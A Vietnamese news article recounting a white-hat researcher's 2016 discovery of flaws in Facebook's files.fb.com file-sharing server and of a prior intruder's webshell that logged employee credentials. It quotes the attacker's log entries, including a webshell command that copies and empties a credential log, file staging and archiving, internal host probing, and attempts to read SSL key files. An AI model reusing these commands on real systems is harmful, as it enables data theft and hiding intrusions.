Một chuyên gia bảo mật đã hack được Facebook, nhưng mọi thứ sau đó mới thật đáng sợ

Máy chủ của Facebook đã bị cài backdoor, keylogger và bị xâm nhập không chỉ 1 lần...

Internet là môi trường vô cùng phức tạp với vô số người tốt, kẻ xấu. Vì thế, rất nhiều hãng công nghệ đã không tiếc tiền treo thưởng cho những ai tìm được lỗ hổng bảo mật trong hệ thống của họ.Google đã chi gần 3 triệu USD trong năm 2015 cho chương trình Bug Bounty Program trong khi đó, Facebook - mạng xã hội lớn nhất hành tinh cũng duy trì chính sách tương tự.

Một chuyên gia bảo mật đã phát hiện tới 7 lỗ hổng bảo mật nghiêm trọng trên Facebook, và mọi chuyện không dừng lại ở đó,...

Một chuyên gia bảo mật đã hack được Facebook, nhưng mọi thứ sau đó mới thật đáng sợ - hình ảnh 1
Facebook liệu có bảo mật như bạn nghĩ?

Orange Tsai, chuyên gia công nghệ của DevCore là một hacker "mũ trắng" - người chuyên săn tìm các lỗ hổng cho các công ty lớn để lấy tiền thường. Tháng 2/2016, Tsai đã bắt đầu thử sức với Facebook bằng việc cố gắng xâm nhập ứng dụng chia sẻ tập tin nội bộ của mạng xã hội lớn nhất hành tinh, cụ thể ở đây là domain files.fb.com - dịch vụ transfer, hosting và syncing file chạy trên nền tảng Secure File Transfer (FTA) do Accellion phát triển.

Một chuyên gia bảo mật đã hack được Facebook, nhưng mọi thứ sau đó mới thật đáng sợ - hình ảnh 2
Orange Tsai bắt đầu với việc xâm nhập domain files.fb.com

Không lâu trước đó, các chuyên gia bảo mật cũng từng phát hiện ra một lỗ hổng trên FTA v0.18 (LINK).Sau khi được Accellion vá lỗi, domain files.fb.com đã nhanh chóng cập nhật lên FTA v0.20.

Thế nhưng, sau khi tìm hiểu sâu vào sourcode (được mã hóa bằng IonCube), Tsai đã tìm ra không chỉ 1 mà tới 7 lỗ hổng bảo mật trên ứng dụng này, bao gồm: 3 lỗ hổng XSS (cross-site scripting), 1 lỗi Pre-auth SQL Injection + Known-Secret-Key cho phép thực thi mã code từ xa và 2 lỗ hổng cho phép leo thang đặc quyền hệ thống (Local Privilege Escalation).

Một chuyên gia bảo mật đã hack được Facebook, nhưng mọi thứ sau đó mới thật đáng sợ - hình ảnh 3
Anh đã phát hiện ra 7 lỗ hổng bao mật, trong có đó lỗ hổng SQL injection cho phép thực thi mã code từ xa

Mọi chuyển trở nên dễ dàng hơn, Tsai tận dụng lỗ hổng SQL injection vừa phát hiện ở trên, truy cập vào máy chủ của Facebook và sau đó chiếm quyền kiểm soát hoàn toàn thiết bị. Cuối cùng, chuyên gia công nghệ này quyết định thông báo tới Facebook để mạng xã hội này sửa lỗi. Tuy nhiên, có 1 thứ còn đáng sợ hơn được Tsai phát hiện.

Máy chủ của Facebook đã bị cài backdoor, keylogger và bị xâm nhập không chỉ 1 lần ...

Trong khi nghiên cứu những file log (tập tin chứa tất cả thông tin về các hoạt động trên máy chủ, như thông tin người truy cập, thời gian khách viếng thăm, địa chỉ IP…. hay thông báo lỗi), Tsai phát hiện những thông báo lỗi rất đáng ngờ.

Cụ thể, một webshell bí ẩn đã được "ai đó" cài lên máy chủ hoạt động như một keylogger có nhiệm vụ ghi lại tất cả thông tin đăng nhập của nhân viên Facebook trên domain files.fb.com vào file log trên.

Một chuyên gia bảo mật đã hack được Facebook, nhưng mọi thứ sau đó mới thật đáng sợ - hình ảnh 5
Mọi việc bắt đầu "đáng sợ" hơn khi Tsai đọc sâu vào file log
Một chuyên gia bảo mật đã hack được Facebook, nhưng mọi thứ sau đó mới thật đáng sợ - hình ảnh 6
Và phát hiện máy chủ Facebook đã bị cài webshell
Một chuyên gia bảo mật đã hack được Facebook, nhưng mọi thứ sau đó mới thật đáng sợ - hình ảnh 7
Keylogger ghi lại username & password của nhân viên Facebook

Sau 1 khoảng thời gian nhất định, hacker lại xâm nhập vào máy chủ Facebook để xóa dấu vết:

192.168.54.13 - - 17955 [Sat, 23 Jan 2016 19:04:10 +0000 | 1453575850] "GET /courier/custom_template/1000/bN3dl0Aw.php?c=./sshpass -p '********' ssh -v -o StrictHostKeyChecking=no soggycat@localhost 'cp /home/seos/courier/B3dKe9sQaa0L.log /home/seos/courier/B3dKe9sQaa0L.log.2; echo > /home/seos/courier/B3dKe9sQaa0L.log' 2>/dev/stdout HTTP/1.1" 200 2559 ...

Lấy thông tin dữ liệu từ file log:

cat tmp_list3_2 | while read line; do cp /home/filex2/1000/$line files; done 2>/dev/stdout

tar -czvf files.tar.gz files

Truy cập hệ thống mail nội bộ của Facebook:

--20:38:09-- https://mail.thefacebook.com/

Resolving mail.thefacebook.com... 192.168.52.37

Connecting to mail.thefacebook.com|192.168.52.37|:443... connected.

HTTP request sent, awaiting response... 302 Found

Location: https://mail.thefacebook.com/owa/ [following]

--20:38:10-- https://mail.thefacebook.com/owa/

Reusing existing connection to mail.thefacebook.com:443.

HTTP request sent, awaiting response... 302 Moved Temporarily

Location: https://mail.thefacebook.com/owa/auth/logon.aspx?url=https://mail.thefacebook.com/owa/&reason=0 [following]

--20:38:10-- https://mail.thefacebook.com/owa/auth/logon.aspx?url=https://mail.thefacebook.com/owa/&reason=0

Reusing existing connection to mail.thefacebook.com:443.

HTTP request sent, awaiting response... 200 OK

Length: 8902 (8.7K) [text/html]

Saving to: `STDOUT'

0K ........ 100% 1.17G=0s

20:38:10 (1.17 GB/s) - `-' saved [8902/8902]

--20:38:33-- (try:15) https://10.8.151.47/

Connecting to 10.8.151.47:443... --20:38:51-- https://svn.thefacebook.com/

Resolving svn.thefacebook.com... failed: Name or service not known.

--20:39:03-- https://sb-dev.thefacebook.com/

Resolving sb-dev.thefacebook.com... failed: Name or service not known.

failed: Connection timed out.

Retrying.

Nghiêm trọng hơn, hacker này còn cố gắng đánh cắp SSL Key:

sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

ls: /etc/opt/apache/ssl.key/server.key: No such file or directory

mv: cannot stat `x': No such file or directory

sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

mv: cannot stat `x': No such file or directory

sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

mv: cannot stat `x': No such file or directory

sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

mv: cannot stat `x': No such file or directory

sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

mv: cannot stat `x': No such file or directory

sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

base64: invalid input

Một chuyên gia bảo mật đã hack được Facebook, nhưng mọi thứ sau đó mới thật đáng sợ - hình ảnh 8
SSL Key xác thực là *.fb.com

Tiếp tục điều tra những file log khác trên hệ thống, Tsai đã xác định được cách thức, thời điểm hacker xâm nhập vào hệ thống máy chủ Facebook, vào tháng 7/2015 và 9/2015 để thu thập dữ liệu trên file log, đánh cắp SSL Key cũng như xóa dấu vết. Chuyên gia bảo mật này cũng khẳng định, đứng sau những lần tấn công vào hệ thống trên của Facebook là 1 người (nhóm người) mà thôi.

Sau khi thu thập tất cả thông tin, hình ảnh cùng những file log bị nghi ngờ, Tsai đã ngay lập tức báo cáo với đội bảo mật Facebook. Ngay lập tức, mạng xã hội này đã tiến hành điều tra lỗ hổng bảo mật trên, bên cạnh việc trao thưởng cho chuyên gia này số tiền 10.000 USD (hơn 220 triệu đồng).

Tham khảo: devco

Video đang hot
Với tốc độ 10 nghìn tỷ FPS, hệ thống camera này còn chụp được ánh sáng đang chuyển động

Việc ghi lại được hành vi của ánh sáng có thể mở ra những lĩnh vực nghiên cứu mới hoặc khám phá những kiến...

Giọng ải giọng ai: Trấn Thanh phấn khích trước màn song ca xuất sắc của Phan Mạnh Quỳnh và 'anh 7 Tài Smile'

Phan Mạnh Quỳnh và anh chàng ở vị trí số 7 đã có màn song ca tuyệt vời, đốn tim người nghe trong đó có...

Giọng Ải Giọng Ai Phan Mạnh Quỳnh

Sang như Ngọc Trinh - Du hí trời Tây, ngắm tháp Eiffel qua cửa sổ khách sạn

Cuộc sống sang chảnh của "Nữ hoàng nội y" tại trời Tây khiến nhiều người ngưỡng mộ.

tháp Eiffel Ngọc Trinh

Lộ diện Miss Võ Lâm Truyền Kỳ Mobile đầu tiên trong lịch sử

Vậy là hành trình kéo dài hơn 2 tháng của cuộc thi Miss Võ Lâm Truyền Kỳ Mobile đã chính thức khép lại...

Miss Võ Lâm Truyền Kỳ Võ Lâm Truyền Kỳ

Nguyễn Trọng Tài chính thức ra mắt MV 'HongKong 1' - Đẳng cấp âm nhạc khiến giới trẻ điên đảo

MV vừa ra mắt đã nhận được sự ủng hộ nhiệt tình từ khán giả, nhất là các bạn trẻ.

MV HongKong1 HongKong1